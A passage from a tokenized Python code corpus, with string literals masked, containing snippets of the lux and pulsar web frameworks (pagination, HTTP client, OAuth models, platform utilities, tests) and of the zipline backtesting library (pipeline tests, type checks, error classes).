. copy ( ) <EOL> for setting in self . option_list : <EOL> cfg . settings [ setting . name ] = setting . copy ( ) <EOL> return application ( callable = app . callable , <EOL> description = self . help , <EOL> epilog = app . config . get ( '<STR_LIT>' ) , <EOL> cfg = cfg , <EOL> argv = argv , <EOL> log_name = log_name , <EOL> version = app . 
meta . version , <EOL> debug = app . debug , <EOL> config = app . config_module , <EOL> ** kw ) </s>
<s> import json <EOL> from lux . core import Html <EOL> from lux . utils . crypt import get_random_string <EOL> def grid ( options , id = None ) : <EOL> if not id : <EOL> id = '<STR_LIT>' % get_random_string ( <NUM_LIT:5> ) <EOL> script = grid_script % ( id , json . dumps ( options ) ) <EOL> container = Html ( '<STR_LIT>' ) . attr ( '<STR_LIT>' , '<STR_LIT>' % id ) <EOL> container . append ( script ) <EOL> return container . render ( ) <EOL> grid_script = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) </s>
<s> from sqlalchemy . orm import relationship , backref <EOL> from sqlalchemy import Column , Integer , String , ForeignKey , DateTime <EOL> from odm . types import JSONType <EOL> from odm import declared_attr , copy_models <EOL> import lux . extensions . auth . models as auth <EOL> copy_models ( auth , __name__ ) <EOL> Model = auth . Model <EOL> class User ( auth . User ) : <EOL> """<STR_LIT>""" <EOL> oauth = Column ( JSONType ) <EOL> class AccessToken ( Model ) : <EOL> """<STR_LIT>""" <EOL> token = Column ( String ( <NUM_LIT:255> ) , primary_key = True ) <EOL> provider = Column ( String ( <NUM_LIT:12> ) , primary_key = True ) <EOL> expires = Column ( DateTime ) <EOL> scope = Column ( JSONType ) <EOL> type = Column ( String ( <NUM_LIT:12> ) ) <EOL> @ declared_attr <EOL> def user_id ( cls ) : <EOL> return Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> @ declared_attr <EOL> def user ( cls ) : <EOL> return relationship ( <EOL> '<STR_LIT>' , <EOL> backref = backref ( "<STR_LIT>" , cascade = "<STR_LIT>" ) ) </s>
<s> from pulsar . utils . httpurl import iri_to_uri <EOL> class Pagination : <EOL> def first_link ( self , request , total , limit , offset ) : <EOL> n = self . _count_part ( offset , limit , <NUM_LIT:0> ) <EOL> if n : <EOL> offset -= n * limit <EOL> if offset > <NUM_LIT:0> : <EOL> return self . link ( request , <NUM_LIT:0> , min ( limit , offset ) ) <EOL> def prev_link ( self , request , total , limit , offset ) : <EOL> if offset : <EOL> olimit = min ( limit , offset ) <EOL> prev_offset = offset - olimit <EOL> return self . link ( request , prev_offset , olimit ) <EOL> def next_link ( self , request , total , limit , offset ) : <EOL> next_offset = offset + limit <EOL> if total > next_offset : <EOL> return self . link ( request , next_offset , limit ) <EOL> def last_link ( self , request , total , limit , offset ) : <EOL> n = self . _count_part ( total , limit , offset ) <EOL> if n > <NUM_LIT:0> : <EOL> return self . link ( request , offset + n * limit , limit ) <EOL> def link ( self , request , offset , limit ) : <EOL> params = request . url_data . copy ( ) <EOL> cfg = request . config <EOL> params . update ( { cfg [ '<STR_LIT>' ] : offset , <EOL> cfg [ '<STR_LIT>' ] : limit } ) <EOL> location = iri_to_uri ( request . path , params ) <EOL> return request . absolute_uri ( location ) <EOL> def __call__ ( self , request , result , total , limit , offset ) : <EOL> data = { <EOL> '<STR_LIT>' : total , <EOL> '<STR_LIT:result>' : result <EOL> } <EOL> first = self . first_link ( request , total , limit , offset ) <EOL> if first : <EOL> data [ '<STR_LIT>' ] = first <EOL> prev = self . prev_link ( request , total , limit , offset ) <EOL> if prev != first : <EOL> data [ '<STR_LIT>' ] = prev <EOL> next = self . next_link ( request , total , limit , offset ) <EOL> if next : <EOL> last = self . 
last_link ( request , total , limit , offset ) <EOL> if last != next : <EOL> data [ '<STR_LIT>' ] = next <EOL> data [ '<STR_LIT>' ] = last <EOL> return data <EOL> def _count_part ( self , total , limit , offset ) : <EOL> n = ( total - offset ) // limit <EOL> if n * limit + offset == total : <EOL> n -= <NUM_LIT:1> <EOL> return max ( <NUM_LIT:0> , n ) <EOL> class GithubPagination ( Pagination ) : <EOL> '''<STR_LIT>''' <EOL> def __call__ ( self , request , result , total , limit , offset ) : <EOL> links = [ ] <EOL> first = self . first_link ( request , total , limit , offset ) <EOL> if first : <EOL> links . append ( first ) <EOL> prev = self . prev_link ( request , total , limit , offset ) <EOL> if prev != first : <EOL> links . append ( prev ) <EOL> next = self . next_link ( request , total , limit , offset ) <EOL> if next : <EOL> last = self . last_link ( request , total , limit , offset ) <EOL> if last != next : <EOL> links . append ( next ) <EOL> links . append ( last ) <EOL> request . response [ '<STR_LIT>' ] = links <EOL> return result </s>
<s> '''<STR_LIT>''' <EOL> from pulsar import arbiter <EOL> def hello ( actor , ** kw ) : <EOL> print ( '<STR_LIT>' ) <EOL> actor . _loop . call_later ( <NUM_LIT:1> , hello , actor ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arbiter ( start = hello ) . start ( ) </s>
<s> from pulsar . apps . http import HttpClient <EOL> from . utils import wait <EOL> class GreenHttp : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , http = None ) : <EOL> self . _http = http or HttpClient ( ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _http , name ) <EOL> def get ( self , url , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return self . request ( '<STR_LIT:GET>' , url , ** kwargs ) <EOL> def options ( self , url , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def head ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def post ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT:POST>' , url , ** kwargs ) <EOL> def put ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def patch ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def delete ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def request ( self , method , url , ** kw ) : <EOL> return wait ( self . _http . request ( method , url , ** kw ) , True ) </s>
<s> """<STR_LIT>""" <EOL> import asyncio <EOL> from functools import partial <EOL> from pulsar . apps import http <EOL> from pulsar . apps . wsgi import HttpServerResponse <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class DummyTransport ( asyncio . Transport ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , connnection ) : <EOL> self . client = client <EOL> self . connection = connnection <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . connection . data_received ( data ) <EOL> @ property <EOL> def address ( self ) : <EOL> return self . connection . address <EOL> class DummyConnectionPool : <EOL> """<STR_LIT>""" <EOL> def get_or_create_connection ( self , producer ) : <EOL> client = self . connection_factory ( self . address , <NUM_LIT:1> , <NUM_LIT:0> , <EOL> producer . consumer_factory , <EOL> producer ) <EOL> server = self . connection_factory ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) , <NUM_LIT:1> , <NUM_LIT:0> , <EOL> producer . server_consumer , <EOL> producer ) <EOL> client . connection_made ( DummyTransport ( producer , server ) ) <EOL> server . connection_made ( DummyTransport ( producer , client ) ) <EOL> return client <EOL> class HttpTestClient ( http . HttpClient ) : <EOL> """<STR_LIT>""" <EOL> client_version = '<STR_LIT>' <EOL> connection_pool = DummyConnectionPool <EOL> def __init__ ( self , test , wsgi_handler , ** kwargs ) : <EOL> self . test = test <EOL> self . wsgi_handler = wsgi_handler <EOL> self . server_consumer = partial ( HttpServerResponse , wsgi_handler , <EOL> test . cfg ) <EOL> super ( ) . __init__ ( ** kwargs ) <EOL> def data_received ( self , connnection , data ) : <EOL> pass <EOL> def response ( self , request ) : <EOL> conn = self . get_connection ( request ) <EOL> consumer = conn . consumer_factory ( conn ) <EOL> consumer . new_request ( request ) <EOL> return consumer </s>
<s> import os <EOL> import signal <EOL> import ctypes <EOL> import ctypes . wintypes <EOL> import socket <EOL> import getpass <EOL> from multiprocessing import current_process <EOL> from . base import * <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> SetHandleInformation = ctypes . windll . kernel32 . SetHandleInformation <EOL> SetHandleInformation . argtypes = ( ctypes . wintypes . HANDLE , ctypes . wintypes . DWORD , <EOL> ctypes . wintypes . DWORD ) <EOL> SetHandleInformation . restype = ctypes . wintypes . BOOL <EOL> HANDLE_FLAG_INHERIT = <NUM_LIT> <EOL> EXIT_SIGNALS = ( signal . SIGINT , signal . SIGTERM , signal . SIGABRT , signal . SIGBREAK ) <EOL> def set_owner_process ( gid , uid ) : <EOL> return None <EOL> def get_parent_id ( ) : <EOL> if ispy32 : <EOL> return os . getppid ( ) <EOL> else : <EOL> return None <EOL> def chown ( path , uid , gid ) : <EOL> pass <EOL> def close_on_exec ( fd ) : <EOL> if fd : <EOL> success = SetHandleInformation ( fd , HANDLE_FLAG_INHERIT , <NUM_LIT:0> ) <EOL> if not success : <EOL> raise ctypes . GetLastError ( ) <EOL> def _set_non_blocking ( fd ) : <EOL> pass <EOL> def get_uid ( user = None ) : <EOL> if not user : <EOL> return getpass . getuser ( ) <EOL> elif user == getpass . getuser ( ) : <EOL> return user <EOL> def get_gid ( group = None ) : <EOL> return None <EOL> def setpgrp ( ) : <EOL> pass <EOL> def get_maxfd ( ) : <EOL> return MAXFD <EOL> def daemonize ( ) : <EOL> pass <EOL> def socketpair ( family = socket . AF_INET , type = socket . SOCK_STREAM , proto = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> lsock = socket . socket ( family , type , proto ) <EOL> lsock . bind ( ( '<STR_LIT:localhost>' , <NUM_LIT:0> ) ) <EOL> lsock . listen ( <NUM_LIT:1> ) <EOL> addr , port = lsock . getsockname ( ) <EOL> csock = socket . socket ( family , type , proto ) <EOL> csock . 
setblocking ( True ) <EOL> try : <EOL> csock . connect ( ( addr , port ) ) <EOL> except Exception : <EOL> lsock . close ( ) <EOL> csock . close ( ) <EOL> raise <EOL> ssock , _ = lsock . accept ( ) <EOL> csock . setblocking ( True ) <EOL> lsock . close ( ) <EOL> return ( ssock , csock ) </s>
<s> import requests <EOL> from pulsar . apps . test import dont_run_with_thread <EOL> class TestRequest : <EOL> session = requests . session ( ) <EOL> @ dont_run_with_thread <EOL> def test_requests_get_200 ( self ) : <EOL> http = self . session <EOL> response = http . get ( self . httpbin ( ) , verify = False , <EOL> proxies = self . proxies ( ) ) <EOL> self . assertEqual ( str ( response ) , '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTrue ( response . content ) <EOL> self . assertEqual ( response . url , self . httpbin ( ) ) <EOL> response = http . get ( self . httpbin ( '<STR_LIT>' ) , verify = False , <EOL> proxies = self . proxies ( ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) </s>
<s> import socket <EOL> import unittest <EOL> from unittest import mock <EOL> from pulsar . utils . internet import ( parse_address , parse_connection_string , <EOL> close_socket , format_address ) <EOL> class TestParseAddress ( unittest . TestCase ) : <EOL> def test_parse_ipv4 ( self ) : <EOL> address = parse_address ( '<STR_LIT:127.0.0.1>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> address = parse_address ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> def test_parse_ipv6 ( self ) : <EOL> address = parse_address ( '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> address = parse_address ( '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> def test_parse_error ( self ) : <EOL> self . assertRaises ( ValueError , parse_address , ( ) ) <EOL> self . assertRaises ( ValueError , parse_address , ( <NUM_LIT:1> , ) ) <EOL> self . assertRaises ( ValueError , parse_address , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> self . assertRaises ( ValueError , parse_address , '<STR_LIT>' ) <EOL> class TestParseConnectionString ( unittest . TestCase ) : <EOL> def test_parse_tcp ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_tcp_default ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_unix ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT>' ) <EOL> self . 
assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , '<STR_LIT>' ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_unix_with_scheme ( self ) : <EOL> scheme , address , params = parse_connection_string ( <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , '<STR_LIT>' ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_tcp_with_scheme_and_params ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { '<STR_LIT>' : '<STR_LIT:3>' } ) <EOL> def test_parse_tcp_with_http_and_params ( self ) : <EOL> scheme , address , params = parse_connection_string ( <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT:http>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> def test_parse_tcp_with_https_and_params ( self ) : <EOL> scheme , address , params = parse_connection_string ( <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> class TestMisc ( unittest . TestCase ) : <EOL> def test_close_socket ( self ) : <EOL> close_socket ( None ) <EOL> sock = mock . Mock ( ) <EOL> sock . configure_mock ( ** { '<STR_LIT>' : TypeError , <EOL> '<STR_LIT>' : TypeError } ) <EOL> close_socket ( sock ) <EOL> sock . shutdown . assert_called_with ( socket . SHUT_RDWR ) <EOL> sock . close . assert_called_with ( ) <EOL> def test_format_address ( self ) : <EOL> self . assertRaises ( ValueError , format_address , ( <NUM_LIT:1> , ) ) <EOL> self . 
assertRaises ( ValueError , format_address , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> self . assertRaises ( ValueError , format_address , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> self . assertEqual ( format_address ( <NUM_LIT:1> ) , '<STR_LIT:1>' ) </s>
<s> """<STR_LIT>""" <EOL> from functools import wraps <EOL> from unittest import TestCase <EOL> import numpy as np <EOL> from numpy import arange , prod <EOL> from pandas import date_range , Int64Index , DataFrame <EOL> from six import iteritems <EOL> from zipline . assets . synthetic import make_simple_equity_info <EOL> from zipline . pipeline . engine import SimplePipelineEngine <EOL> from zipline . pipeline import TermGraph <EOL> from zipline . pipeline . term import AssetExists <EOL> from zipline . testing import ( <EOL> check_arrays , <EOL> ExplodingObject , <EOL> tmp_asset_finder , <EOL> ) <EOL> from zipline . utils . functional import dzip_exact <EOL> from zipline . utils . pandas_utils import explode <EOL> from zipline . utils . tradingcalendar import trading_day <EOL> def with_defaults ( ** default_funcs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> @ wraps ( f ) <EOL> def method ( self , * args , ** kwargs ) : <EOL> for name , func in iteritems ( default_funcs ) : <EOL> if name not in kwargs : <EOL> kwargs [ name ] = func ( self ) <EOL> return f ( self , * args , ** kwargs ) <EOL> return method <EOL> return decorator <EOL> with_default_shape = with_defaults ( shape = lambda self : self . default_shape ) <EOL> class BasePipelineTestCase ( TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . __calendar = date_range ( '<STR_LIT>' , '<STR_LIT>' , freq = trading_day ) <EOL> cls . __assets = assets = Int64Index ( arange ( <NUM_LIT:1> , <NUM_LIT:20> ) ) <EOL> cls . __tmp_finder_ctx = tmp_asset_finder ( <EOL> equities = make_simple_equity_info ( <EOL> assets , <EOL> cls . __calendar [ <NUM_LIT:0> ] , <EOL> cls . __calendar [ - <NUM_LIT:1> ] , <EOL> ) <EOL> ) <EOL> cls . __finder = cls . __tmp_finder_ctx . __enter__ ( ) <EOL> cls . __mask = cls . __finder . lifetimes ( <EOL> cls . __calendar [ - <NUM_LIT:30> : ] , <EOL> include_start_date = False , <EOL> ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . 
__tmp_finder_ctx . __exit__ ( ) <EOL> @ property <EOL> def default_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __mask . shape <EOL> def run_graph ( self , graph , initial_workspace , mask = None ) : <EOL> """<STR_LIT>""" <EOL> engine = SimplePipelineEngine ( <EOL> lambda column : ExplodingObject ( ) , <EOL> self . __calendar , <EOL> self . __finder , <EOL> ) <EOL> if mask is None : <EOL> mask = self . __mask <EOL> dates , assets , mask_values = explode ( mask ) <EOL> initial_workspace . setdefault ( AssetExists ( ) , mask_values ) <EOL> return engine . compute_chunk ( <EOL> graph , <EOL> dates , <EOL> assets , <EOL> initial_workspace , <EOL> ) <EOL> def check_terms ( self , terms , expected , initial_workspace , mask ) : <EOL> """<STR_LIT>""" <EOL> graph = TermGraph ( terms ) <EOL> results = self . run_graph ( graph , initial_workspace , mask ) <EOL> for key , ( res , exp ) in dzip_exact ( results , expected ) . items ( ) : <EOL> check_arrays ( res , exp ) <EOL> def build_mask ( self , array ) : <EOL> """<STR_LIT>""" <EOL> ndates , nassets = array . shape <EOL> return DataFrame ( <EOL> array , <EOL> index = self . __calendar [ - ndates : ] , <EOL> columns = self . __assets [ : nassets ] , <EOL> dtype = bool , <EOL> ) <EOL> @ with_default_shape <EOL> def arange_data ( self , shape , dtype = float ) : <EOL> """<STR_LIT>""" <EOL> return arange ( prod ( shape ) , dtype = dtype ) . reshape ( shape ) <EOL> @ with_default_shape <EOL> def randn_data ( self , seed , shape ) : <EOL> """<STR_LIT>""" <EOL> return np . random . RandomState ( seed ) . randn ( * shape ) <EOL> @ with_default_shape <EOL> def eye_mask ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> return ~ np . eye ( * shape , dtype = bool ) <EOL> @ with_default_shape <EOL> def ones_mask ( self , shape ) : <EOL> return np . ones ( shape , dtype = bool ) </s>
<s> """<STR_LIT>""" <EOL> import hashlib <EOL> import boto <EOL> from . import answer_key <EOL> BUCKET_NAME = '<STR_LIT>' <EOL> def main ( ) : <EOL> with open ( answer_key . ANSWER_KEY_PATH , '<STR_LIT:r>' ) as f : <EOL> md5 = hashlib . md5 ( ) <EOL> while True : <EOL> buf = f . read ( <NUM_LIT> ) <EOL> if not buf : <EOL> break <EOL> md5 . update ( buf ) <EOL> local_hash = md5 . hexdigest ( ) <EOL> s3_conn = boto . connect_s3 ( ) <EOL> bucket = s3_conn . get_bucket ( BUCKET_NAME ) <EOL> key = boto . s3 . key . Key ( bucket ) <EOL> key . key = "<STR_LIT>" . format ( <EOL> local_hash = local_hash ) <EOL> key . set_contents_from_filename ( answer_key . ANSWER_KEY_PATH ) <EOL> key . set_acl ( '<STR_LIT>' ) <EOL> download_link = "<STR_LIT>" . format ( <EOL> bucket_name = BUCKET_NAME , <EOL> key = key . key ) <EOL> print ( "<STR_LIT>" . format ( key = key . key ) ) <EOL> print ( "<STR_LIT>" . format ( download_link = download_link ) ) <EOL> with open ( answer_key . ANSWER_KEY_CHECKSUMS_PATH , '<STR_LIT:a>' ) as checksum_file : <EOL> checksum_file . write ( local_hash ) <EOL> checksum_file . write ( "<STR_LIT:\n>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from six import itervalues <EOL> from unittest import TestCase <EOL> from numpy import ( <EOL> array , <EOL> float16 , <EOL> float32 , <EOL> float64 , <EOL> int16 , <EOL> int32 , <EOL> int64 , <EOL> ) <EOL> from pandas import Timestamp <EOL> from toolz import concat , keyfilter <EOL> from toolz import curry <EOL> from toolz . curried . operator import ne <EOL> from zipline . utils . functional import mapall as lazy_mapall <EOL> from zipline . utils . numpy_utils import ( <EOL> is_float , <EOL> is_int , <EOL> is_datetime , <EOL> make_datetime64D , <EOL> make_datetime64ns , <EOL> NaTns , <EOL> NaTD , <EOL> ) <EOL> def mapall ( * args ) : <EOL> "<STR_LIT>" <EOL> return list ( lazy_mapall ( * args ) ) <EOL> @ curry <EOL> def make_array ( dtype , value ) : <EOL> return array ( [ value ] , dtype = dtype ) <EOL> CASES = { <EOL> int : mapall ( <EOL> ( int , int16 , int32 , int64 , make_array ( int ) ) , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> ) , <EOL> float : mapall ( <EOL> ( float16 , float32 , float64 , float , make_array ( float ) ) , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:1.> , - <NUM_LIT:1.> , float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) , - float ( '<STR_LIT>' ) ] , <EOL> ) , <EOL> datetime : mapall ( <EOL> ( <EOL> make_datetime64D , <EOL> make_datetime64ns , <EOL> Timestamp , <EOL> make_array ( '<STR_LIT>' ) , <EOL> ) , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> ) + [ NaTD , NaTns ] , <EOL> } <EOL> def everything_but ( k , d ) : <EOL> """<STR_LIT>""" <EOL> assert k in d <EOL> return concat ( itervalues ( keyfilter ( ne ( k ) , d ) ) ) <EOL> class TypeCheckTestCase ( TestCase ) : <EOL> def test_is_float ( self ) : <EOL> for good_value in CASES [ float ] : <EOL> self . assertTrue ( is_float ( good_value ) ) <EOL> for bad_value in everything_but ( float , CASES ) : <EOL> self . 
assertFalse ( is_float ( bad_value ) ) <EOL> def test_is_int ( self ) : <EOL> for good_value in CASES [ int ] : <EOL> self . assertTrue ( is_int ( good_value ) ) <EOL> for bad_value in everything_but ( int , CASES ) : <EOL> self . assertFalse ( is_int ( bad_value ) ) <EOL> def test_is_datetime ( self ) : <EOL> for good_value in CASES [ datetime ] : <EOL> self . assertTrue ( is_datetime ( good_value ) ) <EOL> for bad_value in everything_but ( datetime , CASES ) : <EOL> self . assertFalse ( is_datetime ( bad_value ) ) </s>
<s> from zipline . utils . memoize import lazyval <EOL> class ZiplineError ( Exception ) : <EOL> msg = None <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . kwargs = kwargs <EOL> @ lazyval <EOL> def message ( self ) : <EOL> return str ( self ) <EOL> def __str__ ( self ) : <EOL> msg = self . msg . format ( ** self . kwargs ) <EOL> return msg <EOL> __unicode__ = __str__ <EOL> __repr__ = __str__ <EOL> class NoTradeDataAvailable ( ZiplineError ) : <EOL> pass <EOL> class NoTradeDataAvailableTooEarly ( NoTradeDataAvailable ) : <EOL> msg = "<STR_LIT>" <EOL> class NoTradeDataAvailableTooLate ( NoTradeDataAvailable ) : <EOL> msg = "<STR_LIT>" <EOL> class BenchmarkAssetNotAvailableTooEarly ( NoTradeDataAvailableTooEarly ) : <EOL> pass <EOL> class BenchmarkAssetNotAvailableTooLate ( NoTradeDataAvailableTooLate ) : <EOL> pass <EOL> class InvalidBenchmarkAsset ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class WrongDataForTransform ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class UnsupportedSlippageModel ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SetSlippagePostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SetCancelPolicyPostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class RegisterTradingControlPostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class RegisterAccountControlPostInit ( ZiplineError ) : <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class UnsupportedCommissionModel ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class UnsupportedCancelPolicy ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SetCommissionPostInit ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionWithNoVolume ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . 
strip ( ) <EOL> class TransactionWithWrongDirection ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionWithNoAmount ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TransactionVolumeExceedsOrder ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class UnsupportedOrderParameters ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class CannotOrderDelistedAsset ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class BadOrderParameters ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class OrderDuringInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class SetBenchmarkOutsideInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class AccountControlViolation ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class TradingControlViolation ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class IncompatibleHistoryFrequency ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class HistoryInInitialize ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class OrderInBeforeTradingStart ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = "<STR_LIT>" <EOL> class MultipleSymbolsFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SymbolNotFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class RootSymbolNotFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SidsNotFound ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> @ lazyval <EOL> def plural ( self ) : <EOL> return len ( self . sids ) > <NUM_LIT:1> <EOL> @ lazyval <EOL> def sids ( self ) : <EOL> return self . 
kwargs [ '<STR_LIT>' ] <EOL> @ lazyval <EOL> def msg ( self ) : <EOL> if self . plural : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class EquitiesNotFound ( SidsNotFound ) : <EOL> """<STR_LIT>""" <EOL> @ lazyval <EOL> def msg ( self ) : <EOL> if self . plural : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class FutureContractsNotFound ( SidsNotFound ) : <EOL> """<STR_LIT>""" <EOL> @ lazyval <EOL> def msg ( self ) : <EOL> if self . plural : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class ConsumeAssetMetaDataError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class MapAssetIdentifierIndexError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class SidAssignmentError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class NoSourceError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class PipelineDateError ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = """<STR_LIT>""" . strip ( ) <EOL> class WindowLengthTooLong ( ZiplineError ) : <EOL> """<STR_LIT>""" <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) . strip ( ) <EOL> class WindowLengthNotPositive ( ZiplineError ) : 